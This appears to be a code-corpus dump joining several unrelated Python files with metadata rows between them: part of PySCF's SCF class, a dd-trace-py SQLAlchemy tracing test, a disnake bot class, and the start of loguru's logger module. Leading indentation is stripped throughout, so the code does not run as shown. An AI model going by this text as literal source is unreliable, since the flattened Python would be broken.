conv_check = getattr(__config__, 'scf_hf_SCF_conv_check', True)
eigensolver = 'SciPy'
def __init__(self, mol):
if not mol._built:
sys.stderr.write('Warning: %s must be initialized before calling SCF.\n'
'Initialize %s in %s\n' % (mol, mol, self))
mol.build()
self.mol = mol
self.verbose = mol.verbose
self.max_memory = mol.max_memory
self.stdout = mol.stdout
# If chkfile is muted, SCF intermediates will not be dumped anywhere.
if MUTE_CHKFILE:
self.chkfile = None
else:
# the chkfile will be removed automatically, to save the chkfile, assign a
# filename to self.chkfile
self._chkfile = tempfile.NamedTemporaryFile(dir=lib.param.TMPDIR)
self.chkfile = self._chkfile.name
##################################################
# don't modify the following attributes, they are not input options
self.mo_energy = None
self.mo_coeff = None
self.mo_occ = None
self.e_tot = 0
self.converged = False
self.callback = None
self.scf_summary = {}
self.opt = None
self._eri = None # Note: self._eri requires large amount of memory
keys = set(('conv_tol', 'conv_tol_grad', 'max_cycle', 'init_guess',
'DIIS', 'diis', 'diis_space', 'diis_start_cycle',
'diis_file', 'diis_space_rollback', 'damp', 'level_shift',
'direct_scf', 'direct_scf_tol', 'conv_check', 'eigensolver'))
self._keys = set(self.__dict__.keys()).union(keys)
def build(self, mol=None):
if mol is None: mol = self.mol
if self.verbose >= logger.WARN:
self.check_sanity()
# lazily initialize direct SCF
self.opt = None
return self
def dump_flags(self, verbose=None):
log = logger.new_logger(self, verbose)
if log.verbose < logger.INFO:
return self
log.info('\n')
log.info('******** %s ********', self.__class__)
method = [cls.__name__ for cls in self.__class__.__mro__
if issubclass(cls, SCF) and cls != SCF]
log.info('method = %s', '-'.join(method))
log.info('initial guess = %s', self.init_guess)
log.info('damping factor = %g', self.damp)
log.info('level_shift factor = %s', self.level_shift)
if isinstance(self.diis, lib.diis.DIIS):
log.info('DIIS = %s', self.diis)
log.info('diis_start_cycle = %d', self.diis_start_cycle)
log.info('diis_space = %d', self.diis.space)
elif self.diis:
log.info('DIIS = %s', self.DIIS)
log.info('diis_start_cycle = %d', self.diis_start_cycle)
log.info('diis_space = %d', self.diis_space)
log.info('SCF conv_tol = %g', self.conv_tol)
log.info('SCF conv_tol_grad = %s', self.conv_tol_grad)
log.info('SCF max_cycles = %d', self.max_cycle)
log.info('direct_scf = %s', self.direct_scf)
if self.direct_scf:
log.info('direct_scf_tol = %g', self.direct_scf_tol)
if self.chkfile:
log.info('chkfile to save SCF result = %s', self.chkfile)
log.info('max_memory %d MB (current use %d MB)',
self.max_memory, lib.current_memory()[0])
return self
def _eigh(self, h, s):
return eig(h, s, self.eigensolver)
@lib.with_doc(eig.__doc__)
def eig(self, h, s):
# An intermediate call to self._eigh so that the modification to eig function
# can be applied on different level. Different SCF modules like RHF/UHF
# redefine only the eig solver and leave the other modifications (like removing
# linear dependence, sorting eigenvlaue) to low level ._eigh
return self._eigh(h, s)
def get_hcore(self, mol=None):
if mol is None: mol = self.mol
return get_hcore(mol)
def get_ovlp(self, mol=None):
if mol is None: mol = self.mol
return get_ovlp(mol)
get_fock = get_fock
get_occ = get_occ
@lib.with_doc(get_grad.__doc__)
def get_grad(self, mo_coeff, mo_occ, fock=None):
if fock is None:
dm1 = self.make_rdm1(mo_coeff, mo_occ)
fock = self.get_hcore(self.mol) + self.get_veff(self.mol, dm1)
return get_grad(mo_coeff, mo_occ, fock)
def dump_chk(self, envs):
if self.chkfile:
chkfile.dump_scf(self.mol, self.chkfile,
envs['e_tot'], envs['mo_energy'],
envs['mo_coeff'], envs['mo_occ'],
overwrite_mol=False)
return self
@lib.with_doc(init_guess_by_minao.__doc__)
def init_guess_by_minao(self, mol=None):
if mol is None: mol = self.mol
return init_guess_by_minao(mol)
@lib.with_doc(init_guess_by_atom.__doc__)
def init_guess_by_atom(self, mol=None):
if mol is None: mol = self.mol
logger.info(self, 'Initial guess from superposition of atomic densities.')
return init_guess_by_atom(mol)
@lib.with_doc(init_guess_by_huckel.__doc__)
def init_guess_by_huckel(self, mol=None):
if mol is None: mol = self.mol
logger.info(self, 'Initial guess from on-the-fly Huckel, doi:10.1021/acs.jctc.8b01089.')
mo_energy, mo_coeff = _init_guess_huckel_orbitals(mol)
mo_occ = self.get_occ(mo_energy, mo_coeff)
return self.make_rdm1(mo_coeff, mo_occ)
@lib.with_doc(init_guess_by_1e.__doc__)
def init_guess_by_1e(self, mol=None):
if mol is None: mol = self.mol
logger.info(self, 'Initial guess from hcore.')
h1e = self.get_hcore(mol)
s1e = self.get_ovlp(mol)
mo_energy, mo_coeff = self.eig(h1e, s1e)
mo_occ = self.get_occ(mo_energy, mo_coeff)
return self.make_rdm1(mo_coeff, mo_occ)
@lib.with_doc(init_guess_by_chkfile.__doc__)
def init_guess_by_chkfile(self, chkfile=None, project=None):
if isinstance(chkfile, gto.Mole):
raise TypeError('''
You see this error message because of the API updates.
The first argument needs to be the name of a chkfile.''')
if chkfile is None: chkfile = self.chkfile
return init_guess_by_chkfile(self.mol, chkfile, project=project)
def from_chk(self, chkfile=None, project=None):
return self.init_guess_by_chkfile(chkfile, project)
from_chk.__doc__ = init_guess_by_chkfile.__doc__
def get_init_guess(self, mol=None, key='minao'):
if not isinstance(key, (str, unicode)):
return key
key = key.lower()
if mol is None:
mol = self.mol
if key == '1e' or key == 'hcore':
dm = self.init_guess_by_1e(mol)
elif key == 'huckel':
dm = self.init_guess_by_huckel(mol)
elif getattr(mol, 'natm', 0) == 0:
logger.info(self, 'No atom found in mol. Use 1e initial guess')
dm = self.init_guess_by_1e(mol)
elif key == 'atom':
dm = self.init_guess_by_atom(mol)
elif key == 'vsap' and hasattr(self, 'init_guess_by_vsap'):
# Only available for DFT objects
dm = self.init_guess_by_vsap(mol)
elif key[:3] == 'chk':
try:
dm = self.init_guess_by_chkfile()
except (IOError, KeyError):
logger.warn(self, 'Fail in reading %s. Use MINAO initial guess',
self.chkfile)
dm = self.init_guess_by_minao(mol)
else:
dm = self.init_guess_by_minao(mol)
if self.verbose >= logger.DEBUG1:
s = self.get_ovlp()
if isinstance(dm, numpy.ndarray) and dm.ndim == 2:
nelec = numpy.einsum('ij,ji', dm, s).real
else: # UHF
nelec =(numpy.einsum('ij,ji', dm[0], s).real,
numpy.einsum('ij,ji', dm[1], s).real)
logger.debug1(self, 'Nelec from initial guess = %s', nelec)
return dm
# full density matrix for RHF
@lib.with_doc(make_rdm1.__doc__)
def make_rdm1(self, mo_coeff=None, mo_occ=None, **kwargs):
if mo_occ is None: mo_occ = self.mo_occ
if mo_coeff is None: mo_coeff = self.mo_coeff
return make_rdm1(mo_coeff, mo_occ, **kwargs)
energy_elec = energy_elec
energy_tot = energy_tot
def energy_nuc(self):
return self.mol.energy_nuc()
# A hook for overloading convergence criteria in SCF iterations. Assigning
# a function
# f(envs) => bool
# to check_convergence can overwrite the default convergence criteria
check_convergence = None
def scf(self, dm0=None, **kwargs):
'''SCF main driver
Kwargs:
dm0 : ndarray
If given, it will be used as the initial guess density matrix
Examples:
>>> import numpy
>>> from pyscf import gto, scf
>>> mol = gto.M(atom='H 0 0 0; F 0 0 1.1')
>>> mf = scf.hf.SCF(mol)
>>> dm_guess = numpy.eye(mol.nao_nr())
>>> mf.kernel(dm_guess)
converged SCF energy = -98.5521904482821
-98.552190448282104
'''
cput0 = (time.clock(), time.time())
self.dump_flags()
self.build(self.mol)
if self.max_cycle > 0 or self.mo_coeff is None:
self.converged, self.e_tot, \
self.mo_energy, self.mo_coeff, self.mo_occ = \
kernel(self, self.conv_tol, self.conv_tol_grad,
dm0=dm0, callback=self.callback,
conv_check=self.conv_check, **kwargs)
else:
# Avoid to update SCF orbitals in the non-SCF initialization
# (issue #495). But run regular SCF for initial guess if SCF was
# not initialized.
self.e_tot = kernel(self, self.conv_tol, self.conv_tol_grad,
dm0=dm0, callback=self.callback,
conv_check=self.conv_check, **kwargs)[1]
logger.timer(self, 'SCF', *cput0)
self._finalize()
return self.e_tot
kernel = lib.alias(scf, alias_name='kernel')
def _finalize(self):
'''Hook for dumping results and clearing up the object.'''
if self.converged:
logger.note(self, 'converged SCF energy = %.15g', self.e_tot)
else:
logger.note(self, 'SCF not converged.')
logger.note(self, 'SCF energy = %.15g', self.e_tot)
return self
def init_direct_scf(self, mol=None):
if mol is None: mol = self.mol
# Integrals < direct_scf_tol may be set to 0 in int2e.
# Higher accuracy is required for Schwartz inequality prescreening.
with mol.with_integral_screen(self.direct_scf_tol**2):
opt = _vhf.VHFOpt(mol, 'int2e', 'CVHFnrs8_prescreen',
'CVHFsetnr_direct_scf',
'CVHFsetnr_direct_scf_dm')
opt.direct_scf_tol = self.direct_scf_tol
return opt
@lib.with_doc(get_jk.__doc__)
def get_jk(self, mol=None, dm=None, hermi=1, with_j=True, with_k=True,
omega=None):
if mol is None: mol = self.mol
if dm is None: dm = self.make_rdm1()
cpu0 = (time.clock(), time.time())
if self.direct_scf and self.opt is None:
self.opt = self.init_direct_scf(mol)
if with_j and with_k:
vj, vk = get_jk(mol, dm, hermi, self.opt, with_j, with_k, omega)
else:
if with_j:
prescreen = 'CVHFnrs8_vj_prescreen'
else:
prescreen = 'CVHFnrs8_vk_prescreen'
with lib.temporary_env(self.opt, prescreen=prescreen):
vj, vk = get_jk(mol, dm, hermi, self.opt, with_j, with_k, omega)
logger.timer(self, 'vj and vk', *cpu0)
return vj, vk
def get_j(self, mol=None, dm=None, hermi=1, omega=None):
'''Compute J matrices for all input density matrices
'''
return self.get_jk(mol, dm, hermi, with_k=False, omega=omega)[0]
def get_k(self, mol=None, dm=None, hermi=1, omega=None):
'''Compute K matrices for all input density matrices
'''
return self.get_jk(mol, dm, hermi, with_j=False, omega=omega)[1]
@lib.with_doc(get_veff.__doc__)
def get_veff(self, mol=None, dm=None, dm_last=0, vhf_last=0, hermi=1):
# Be carefule with the effects of :attr:`SCF.direct_scf` on this function
if mol is None: mol = self.mol
if dm is None: dm = self.make_rdm1()
if self.direct_scf:
ddm = numpy.asarray(dm) - dm_last
vj, vk = self.get_jk(mol, ddm, hermi=hermi)
return vhf_last + vj - vk * .5
else:
vj, vk = self.get_jk(mol, dm, hermi=hermi)
return vj - vk * .5
@lib.with_doc(analyze.__doc__)
def analyze(self, verbose=None, with_meta_lowdin=WITH_META_LOWDIN,
**kwargs):
if verbose is None: verbose = self.verbose
return analyze(self, verbose, with_meta_lowdin, **kwargs)
dump_scf_summary = dump_scf_summary
@lib.with_doc(mulliken_pop.__doc__)
def mulliken_pop(self, mol=None, dm=None, s=None, verbose=logger.DEBUG):
if mol is None: mol = self.mol
if dm is None: dm = self.make_rdm1()
if s is None: s = self.get_ovlp(mol)
return mulliken_pop(mol, dm, s=s, verbose=verbose)
@lib.with_doc(mulliken_meta.__doc__)
def mulliken_meta(self, mol=None, dm=None, verbose=logger.DEBUG,
pre_orth_method=PRE_ORTH_METHOD, s=None):
if mol is None: mol = self.mol
if dm is None: dm = self.make_rdm1()
if s is None: s = self.get_ovlp(mol)
return mulliken_meta(mol, dm, s=s, verbose=verbose,
pre_orth_method=pre_orth_method)
def pop(self, *args, **kwargs):
return self.mulliken_meta(*args, **kwargs)
pop.__doc__ = mulliken_meta.__doc__
mulliken_pop_meta_lowdin_ao = pop
canonicalize = canonicalize
@lib.with_doc(dip_moment.__doc__)
def dip_moment(self, mol=None, dm=None, unit='Debye', verbose=logger.NOTE,
**kwargs):
if mol is None: mol = self.mol
if dm is None: dm =self.make_rdm1()
return dip_moment(mol, dm, unit, verbose=verbose, **kwargs)
def _is_mem_enough(self):
nbf = self.mol.nao_nr()
return nbf**4/1e6+lib.current_memory()[0] < self.max_memory*.95
def density_fit(self, auxbasis=None, with_df=None, only_dfj=False):
import pyscf.df.df_jk
return pyscf.df.df_jk.density_fit(self, auxbasis, with_df, only_dfj)
def sfx2c1e(self):
import pyscf.x2c.sfx2c1e
return pyscf.x2c.sfx2c1e.sfx2c1e(self)
x2c1e = sfx2c1e
x2c = x2c1e
def newton(self):
import pyscf.soscf.newton_ah
return pyscf.soscf.newton_ah.newton(self)
def nuc_grad_method(self): # pragma: no cover
'''Hook to create object for analytical nuclear gradients.'''
pass
def update_(self, chkfile=None):
'''Read attributes from the chkfile then replace the attributes of
current object. It's an alias of function update_from_chk_.
'''
from pyscf.scf import chkfile as chkmod
if chkfile is None: chkfile = self.chkfile
self.__dict__.update(chkmod.load(chkfile, 'scf'))
return self
update_from_chk = update_from_chk_ = update = update_
as_scanner = as_scanner
def reset(self, mol=None):
'''Reset mol and relevant attributes associated to the old mol object'''
if mol is not None:
self.mol = mol
self.opt = None
self._eri = None
return self
@property
def hf_energy(self): # pragma: no cover
sys.stderr.write('WARN: Attribute .hf_energy will be removed in PySCF v1.1. '
'It is replaced by attribute .e_tot\n')
return self.e_tot
@hf_energy.setter
def hf_energy(self, x): # pragma: no cover
sys.stderr.write('WARN: Attribute .hf_energy will be removed in PySCF v1.1. '
'It is replaced by attribute .e_tot\n')
self.hf_energy = x
@property
def level_shift_factor(self): # pragma: no cover
sys.stderr.write('WARN: Attribute .level_shift_factor will be removed in PySCF v1.1. '
'It is replaced by attribute .level_shift\n')
return self.level_shift
@level_shift_factor.setter
def level_shift_factor(self, x): # pragma: no cover
sys.stderr.write('WARN: Attribute .level_shift_factor will be removed in PySCF v1.1. '
'It is replaced by attribute .level_shift\n')
self.level_shift = x
@property
def damp_factor(self): # pragma: no cover
sys.stderr.write('WARN: Attribute .damp_factor will be removed in PySCF v1.1. '
'It is replaced by attribute .damp\n')
return self.damp
@damp_factor.setter
def damp_factor(self, x): # pragma: no cover
sys.stderr.write('WARN: Attribute .damp_factor will be removed in PySCF v1.1. '
'It is replaced by attribute .damp\n')
self.damp = x
def apply(self, fn, *args, **kwargs):
if callable(fn):
return lib.StreamObject.apply(self, fn, *args, **kwargs)
elif isinstance(fn, (str, unicode)):
from pyscf import mp, cc, ci, mcscf, tdscf
for mod in (mp, cc, ci, mcscf, tdscf):
method = getattr(mod, fn.upper(), None)
if method is not None and callable(method):
if self.mo_coeff is None:
logger.warn(self, 'SCF object must be initialized '
'before calling post-SCF methods.\n'
'Initialize %s for %s', self, mod)
self.kernel()
return method(self, *args, **kwargs)
raise ValueError('Unknown method %s' % fn)
else:
raise TypeError('First argument of .apply method must be a '
'function/class or a name (string) of a method.')
def to_rhf(self):
'''Convert the input mean-field object to a RHF/ROHF object.
Note this conversion only changes the class of the mean-field object.
The total energy and wave-function are the same as them in the input
mean-field object.
'''
from pyscf.scf import addons
mf = addons.convert_to_rhf(self)
if not isinstance(self, RHF):
mf.converged = False
return mf
def to_uhf(self):
'''Convert the input mean-field object to a UHF object.
Note this conversion only changes the class of the mean-field object.
The total energy and wave-function are the same as them in the input
mean-field object.
'''
from pyscf.scf import addons
return addons.convert_to_uhf(self)
def to_ghf(self):
'''Convert the input mean-field object to a GHF object.
Note this conversion only changes the class of the mean-field object.
The total energy and wave-function are the same as them in the input
mean-field object.
'''
from pyscf.scf import addons
return addons.convert_to_ghf(self)
def to_rks(self, xc='HF'):
'''Convert the input mean-field object to a RKS/ROKS object.
Note this conversion only changes the class of the mean-field object.
The total energy and wave-function are the same as them in the input
mean-field object.
'''
from pyscf import dft
mf = dft.RKS(self.mol, xc=xc)
mf.__dict__.update(self.to_rhf().__dict__)
mf.converged = False
return mf
def to_uks(self, xc='HF'):
'''Convert the input mean-field object to a UKS object.
Note this conversion only changes the class of the mean-field object.
The total energy and wave-function are the same as them in the input
mean-field object.
'''
from pyscf import dft
mf = dft.UKS(self.mol, xc=xc)
mf.__dict__.update(self.to_uhf().__dict__)
mf.converged = False
return mf
def to_gks(self, xc='HF'):
'''Convert the input mean-field object to a GKS object.
Note this conversion only changes the class of the mean-field object.
The total energy and wave-function are the same as them in the input
mean-field object.
'''
from pyscf import dft
mf = dft.GKS(self.mol, xc=xc)
mf.__dict__.update(self.to_ghf().__dict__)
mf.converged = False
return mf
############
class RHF(SCF):
__doc__ = SCF.__doc__
def check_sanity(self):
mol = self.mol
if mol.nelectron != 1 and mol.spin != 0:
logger.warn(self, 'Invalid number of electrons %d for RHF method.',
mol.nelectron)
return SCF.check_sanity(self)
@lib.with_doc(get_jk.__doc__)
def get_jk(self, mol=None, dm=None, hermi=1, with_j=True, with_k=True,
omega=None):
# Note the incore version, which initializes an _eri array in memory.
if mol is None: mol = self.mol
if dm is None: dm = self.make_rdm1()
if (not omega and
(self._eri is not None or mol.incore_anyway or self._is_mem_enough())):
if self._eri is None:
self._eri = mol.intor('int2e', aosym='s8')
vj, vk = dot_eri_dm(self._eri, dm, hermi, with_j, with_k)
else:
vj, vk = SCF.get_jk(self, mol, dm, hermi, with_j, with_k, omega)
return vj, vk
@lib.with_doc(get_veff.__doc__)
def get_veff(self, mol=None, dm=None, dm_last=0, vhf_last=0, hermi=1):
if mol is None: mol = self.mol
if dm is None: dm = self.make_rdm1()
if self._eri is not None or not self.direct_scf:
vj, vk = self.get_jk(mol, dm, hermi)
vhf = vj - vk * .5
else:
ddm = numpy.asarray(dm) - numpy.asarray(dm_last)
vj, vk = self.get_jk(mol, ddm, hermi)
vhf = vj - vk * .5
vhf += numpy.asarray(vhf_last)
return vhf
def convert_from_(self, mf):
'''Convert the input mean-field object to RHF/ROHF'''
from pyscf.scf import addons
return addons.convert_to_rhf(mf, out=self)
def spin_square(self, mo_coeff=None, s=None): # pragma: no cover
'''Spin square and multiplicity of RHF determinant'''
return 0, 1
def stability(self,
internal=getattr(__config__, 'scf_stability_internal', True),
external=getattr(__config__, 'scf_stability_external', False),
verbose=None):
'''
RHF/RKS stability analysis.
See also pyscf.scf.stability.rhf_stability function.
Kwargs:
internal : bool
Internal stability, within the RHF optimization space.
external : bool
External stability. Including the RHF -> UHF and real -> complex
stability analysis.
Returns:
New orbitals that are more close to the stable condition. The return
value includes two set of orbitals. The first corresponds to the
internal stability and the second corresponds to the external stability.
'''
from pyscf.scf.stability import rhf_stability
return rhf_stability(self, internal, external, verbose)
def nuc_grad_method(self):
from pyscf.grad import rhf
return rhf.Gradients(self)
del(WITH_META_LOWDIN, PRE_ORTH_METHOD)
if __name__ == '__main__':
from pyscf import scf
mol = gto.Mole()
mol.verbose = 5
mol.output = None
mol.atom = [['He', (0, 0, 0)], ]
mol.basis = 'ccpvdz'
mol.build(0, 0)
##############
# SCF result
method = scf.RHF(mol).x2c().density_fit().newton()
method.init_guess = '1e'
energy = method.scf()
print(energy)
| 35.552964
| 104
| 0.597775
|
4a1124873aa39b3bdef22d6f64e413bbfc80a345
| 4,079
|
py
|
Python
|
tests/contrib/sqlalchemy/test_patch.py
|
mbmblbelt/dd-trace-py
|
906fb7fa91d0ed59d263df74e14aacc8b2d70251
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
tests/contrib/sqlalchemy/test_patch.py
|
mbmblbelt/dd-trace-py
|
906fb7fa91d0ed59d263df74e14aacc8b2d70251
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
tests/contrib/sqlalchemy/test_patch.py
|
mbmblbelt/dd-trace-py
|
906fb7fa91d0ed59d263df74e14aacc8b2d70251
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
import sqlalchemy
from ddtrace import Pin
from ddtrace.constants import ANALYTICS_SAMPLE_RATE_KEY
from ddtrace.contrib.sqlalchemy import patch
from ddtrace.contrib.sqlalchemy import unpatch
from ... import TracerTestCase
from ... import assert_is_measured
from ..config import POSTGRES_CONFIG
class SQLAlchemyPatchTestCase(TracerTestCase):
"""TestCase that checks if the engine is properly traced
when the `patch()` method is used.
"""
def setUp(self):
super(SQLAlchemyPatchTestCase, self).setUp()
# create a traced engine with the given arguments
# and configure the current PIN instance
patch()
dsn = 'postgresql://%(user)s:%(password)s@%(host)s:%(port)s/%(dbname)s' % POSTGRES_CONFIG
self.engine = sqlalchemy.create_engine(dsn)
Pin.override(self.engine, tracer=self.tracer)
# prepare a connection
self.conn = self.engine.connect()
def tearDown(self):
super(SQLAlchemyPatchTestCase, self).tearDown()
# clear the database and dispose the engine
self.conn.close()
self.engine.dispose()
unpatch()
def test_engine_traced(self):
# ensures that the engine is traced
rows = self.conn.execute('SELECT 1').fetchall()
assert len(rows) == 1
traces = self.tracer.writer.pop_traces()
# trace composition
assert len(traces) == 1
assert len(traces[0]) == 1
span = traces[0][0]
# check subset of span fields
assert_is_measured(span)
assert span.name == 'postgres.query'
assert span.service == 'postgres'
assert span.error == 0
assert span.duration > 0
def test_engine_pin_service(self):
# ensures that the engine service is updated with the PIN object
Pin.override(self.engine, service='replica-db')
rows = self.conn.execute('SELECT 1').fetchall()
assert len(rows) == 1
traces = self.tracer.writer.pop_traces()
# trace composition
assert len(traces) == 1
assert len(traces[0]) == 1
span = traces[0][0]
# check subset of span fields
assert_is_measured(span)
assert span.name == 'postgres.query'
assert span.service == 'replica-db'
assert span.error == 0
assert span.duration > 0
def test_analytics_sample_rate(self):
# [ <config>, <analytics sample rate metric value> ]
matrix = [
# Default, not enabled, not set
[dict(), None],
# Not enabled, but sample rate set
[dict(analytics_sample_rate=0.5), None],
# Enabled and rate set
[dict(analytics_enabled=True, analytics_sample_rate=0.5), 0.5],
[dict(analytics_enabled=True, analytics_sample_rate=1), 1.0],
[dict(analytics_enabled=True, analytics_sample_rate=0), 0],
[dict(analytics_enabled=True, analytics_sample_rate=True), 1.0],
[dict(analytics_enabled=True, analytics_sample_rate=False), 0],
# Disabled and rate set
[dict(analytics_enabled=False, analytics_sample_rate=0.5), None],
# Enabled and rate not set
[dict(analytics_enabled=True), 1.0],
]
for config, metric_value in matrix:
with self.override_config('sqlalchemy', config):
self.conn.execute('SELECT 1').fetchall()
root = self.get_root_span()
assert_is_measured(root)
root.assert_matches(name='postgres.query')
# If the value is None assert it was not set, otherwise assert the expected value
# DEV: root.assert_metrics(metrics, exact=True) won't work here since we have another sample
# rate keys getting added
if metric_value is None:
assert ANALYTICS_SAMPLE_RATE_KEY not in root.metrics
else:
assert root.metrics[ANALYTICS_SAMPLE_RATE_KEY] == metric_value
self.reset()
| 36.747748
| 108
| 0.619024
|
4a1125cc680ae42d54571abd694b863b5e7ed14a
| 716
|
py
|
Python
|
src/internal/bot.py
|
gtaodiscord/modmail
|
9584f29aff57969368310f56f3f75e3e0b889b11
|
[
"MIT"
] | null | null | null |
src/internal/bot.py
|
gtaodiscord/modmail
|
9584f29aff57969368310f56f3f75e3e0b889b11
|
[
"MIT"
] | null | null | null |
src/internal/bot.py
|
gtaodiscord/modmail
|
9584f29aff57969368310f56f3f75e3e0b889b11
|
[
"MIT"
] | null | null | null |
from disnake import Intents
from disnake.ext.commands import Bot as _BotBase
from loguru import logger
from src.utils import get_config
class Bot(_BotBase):
def __init__(self, *args, **kwargs) -> None:
self.config = get_config()
intents = Intents.default()
intents.members = True
super().__init__(
intents=intents, command_prefix=self.config.prefix, *args, **kwargs
)
@staticmethod
async def on_connect() -> None:
logger.info("Connected to Discord.")
@staticmethod
async def on_ready() -> None:
logger.info("Bot is ready.")
@staticmethod
async def on_resume() -> None:
logger.warning("Bot has resumed.")
| 23.866667
| 79
| 0.641061
|
4a1125f495dc5a809aecaa1fdc24d6457dae3fd6
| 92,735
|
py
|
Python
|
loguru/_logger.py
|
phillipuniverse/loguru
|
3d5234541c81318e7f6f725eca7bab294fe09c23
|
[
"MIT"
] | 11,391
|
2018-12-08T17:44:13.000Z
|
2022-03-31T17:55:24.000Z
|
loguru/_logger.py
|
vkirilenko/loguru
|
68616485f4f0decb5fced36a16040f5e05e2842f
|
[
"MIT"
] | 610
|
2018-12-08T18:03:03.000Z
|
2022-03-31T22:28:14.000Z
|
loguru/_logger.py
|
vkirilenko/loguru
|
68616485f4f0decb5fced36a16040f5e05e2842f
|
[
"MIT"
] | 601
|
2018-12-08T17:46:42.000Z
|
2022-03-30T04:23:56.000Z
|
"""
.. References and links rendered by Sphinx are kept here as "module documentation" so that they can
be used in the ``Logger`` docstrings but do not pollute ``help(logger)`` output.
.. |Logger| replace:: :class:`~Logger`
.. |add| replace:: :meth:`~Logger.add()`
.. |remove| replace:: :meth:`~Logger.remove()`
.. |complete| replace:: :meth:`~Logger.complete()`
.. |catch| replace:: :meth:`~Logger.catch()`
.. |bind| replace:: :meth:`~Logger.bind()`
.. |contextualize| replace:: :meth:`~Logger.contextualize()`
.. |patch| replace:: :meth:`~Logger.patch()`
.. |opt| replace:: :meth:`~Logger.opt()`
.. |log| replace:: :meth:`~Logger.log()`
.. |level| replace:: :meth:`~Logger.level()`
.. |enable| replace:: :meth:`~Logger.enable()`
.. |disable| replace:: :meth:`~Logger.disable()`
.. |str| replace:: :class:`str`
.. |int| replace:: :class:`int`
.. |bool| replace:: :class:`bool`
.. |tuple| replace:: :class:`tuple`
.. |namedtuple| replace:: :func:`namedtuple<collections.namedtuple>`
.. |list| replace:: :class:`list`
.. |dict| replace:: :class:`dict`
.. |str.format| replace:: :meth:`str.format()`
.. |Path| replace:: :class:`pathlib.Path`
.. |match.groupdict| replace:: :meth:`re.Match.groupdict()`
.. |Handler| replace:: :class:`logging.Handler`
.. |sys.stderr| replace:: :data:`sys.stderr`
.. |sys.exc_info| replace:: :func:`sys.exc_info()`
.. |time| replace:: :class:`datetime.time`
.. |datetime| replace:: :class:`datetime.datetime`
.. |timedelta| replace:: :class:`datetime.timedelta`
.. |open| replace:: :func:`open()`
.. |logging| replace:: :mod:`logging`
.. |signal| replace:: :mod:`signal`
.. |contextvars| replace:: :mod:`contextvars`
.. |Thread.run| replace:: :meth:`Thread.run()<threading.Thread.run()>`
.. |Exception| replace:: :class:`Exception`
.. |locale.getpreferredencoding| replace:: :func:`locale.getpreferredencoding()`
.. |AbstractEventLoop| replace:: :class:`AbstractEventLoop<asyncio.AbstractEventLoop>`
.. |asyncio.get_event_loop| replace:: :func:`asyncio.get_event_loop()`
.. |asyncio.run| replace:: :func:`asyncio.run()`
.. |loop.run_until_complete| replace::
:meth:`loop.run_until_complete()<asyncio.loop.run_until_complete()>`
.. |loop.create_task| replace:: :meth:`loop.create_task()<asyncio.loop.create_task()>`
.. |logger.trace| replace:: :meth:`logger.trace()<Logger.trace()>`
.. |logger.debug| replace:: :meth:`logger.debug()<Logger.debug()>`
.. |logger.info| replace:: :meth:`logger.info()<Logger.info()>`
.. |logger.success| replace:: :meth:`logger.success()<Logger.success()>`
.. |logger.warning| replace:: :meth:`logger.warning()<Logger.warning()>`
.. |logger.error| replace:: :meth:`logger.error()<Logger.error()>`
.. |logger.critical| replace:: :meth:`logger.critical()<Logger.critical()>`
.. |file-like object| replace:: ``file-like object``
.. _file-like object: https://docs.python.org/3/glossary.html#term-file-object
.. |callable| replace:: ``callable``
.. _callable: https://docs.python.org/3/library/functions.html#callable
.. |coroutine function| replace:: ``coroutine function``
.. _coroutine function: https://docs.python.org/3/glossary.html#term-coroutine-function
.. |re.Pattern| replace:: ``re.Pattern``
.. _re.Pattern: https://docs.python.org/3/library/re.html#re-objects
.. |better_exceptions| replace:: ``better_exceptions``
.. _better_exceptions: https://github.com/Qix-/better-exceptions
.. _Pendulum: https://pendulum.eustace.io/docs/#tokens
.. _@sdispater: https://github.com/sdispater
.. _@Qix-: https://github.com/Qix-
.. _Formatting directives: https://docs.python.org/3/library/string.html#format-string-syntax
.. _reentrant: https://en.wikipedia.org/wiki/Reentrancy_(computing)
"""
import asyncio
import builtins
import contextlib
import functools
import itertools
import logging
import re
import sys
import warnings
from collections import namedtuple
from inspect import isclass, iscoroutinefunction, isgeneratorfunction
from multiprocessing import current_process
from os.path import basename, splitext
from threading import current_thread
from . import _colorama, _defaults, _filters
from ._better_exceptions import ExceptionFormatter
from ._colorizer import Colorizer
from ._datetime import aware_now
from ._error_interceptor import ErrorInterceptor
from ._file_sink import FileSink
from ._get_frame import get_frame
from ._handler import Handler
from ._locks_machinery import create_logger_lock
from ._recattrs import RecordException, RecordFile, RecordLevel, RecordProcess, RecordThread
from ._simple_sinks import AsyncSink, CallableSink, StandardSink, StreamSink
if sys.version_info >= (3, 6):
from os import PathLike
else:
from pathlib import PurePath as PathLike
if sys.version_info >= (3, 7):
from contextvars import ContextVar
elif sys.version_info >= (3, 5, 3):
from aiocontextvars import ContextVar
else:
from contextvars import ContextVar
Level = namedtuple("Level", ["name", "no", "color", "icon"])
start_time = aware_now()
context = ContextVar("loguru_context", default={})
class Core:
def __init__(self):
levels = [
Level(
"TRACE",
_defaults.LOGURU_TRACE_NO,
_defaults.LOGURU_TRACE_COLOR,
_defaults.LOGURU_TRACE_ICON,
),
Level(
"DEBUG",
_defaults.LOGURU_DEBUG_NO,
_defaults.LOGURU_DEBUG_COLOR,
_defaults.LOGURU_DEBUG_ICON,
),
Level(
"INFO",
_defaults.LOGURU_INFO_NO,
_defaults.LOGURU_INFO_COLOR,
_defaults.LOGURU_INFO_ICON,
),
Level(
"SUCCESS",
_defaults.LOGURU_SUCCESS_NO,
_defaults.LOGURU_SUCCESS_COLOR,
_defaults.LOGURU_SUCCESS_ICON,
),
Level(
"WARNING",
_defaults.LOGURU_WARNING_NO,
_defaults.LOGURU_WARNING_COLOR,
_defaults.LOGURU_WARNING_ICON,
),
Level(
"ERROR",
_defaults.LOGURU_ERROR_NO,
_defaults.LOGURU_ERROR_COLOR,
_defaults.LOGURU_ERROR_ICON,
),
Level(
"CRITICAL",
_defaults.LOGURU_CRITICAL_NO,
_defaults.LOGURU_CRITICAL_COLOR,
_defaults.LOGURU_CRITICAL_ICON,
),
]
self.levels = {level.name: level for level in levels}
self.levels_ansi_codes = {
name: Colorizer.ansify(level.color) for name, level in self.levels.items()
}
self.levels_ansi_codes[None] = ""
self.handlers_count = itertools.count()
self.handlers = {}
self.extra = {}
self.patcher = None
self.min_level = float("inf")
self.enabled = {}
self.activation_list = []
self.activation_none = True
self.lock = create_logger_lock()
def __getstate__(self):
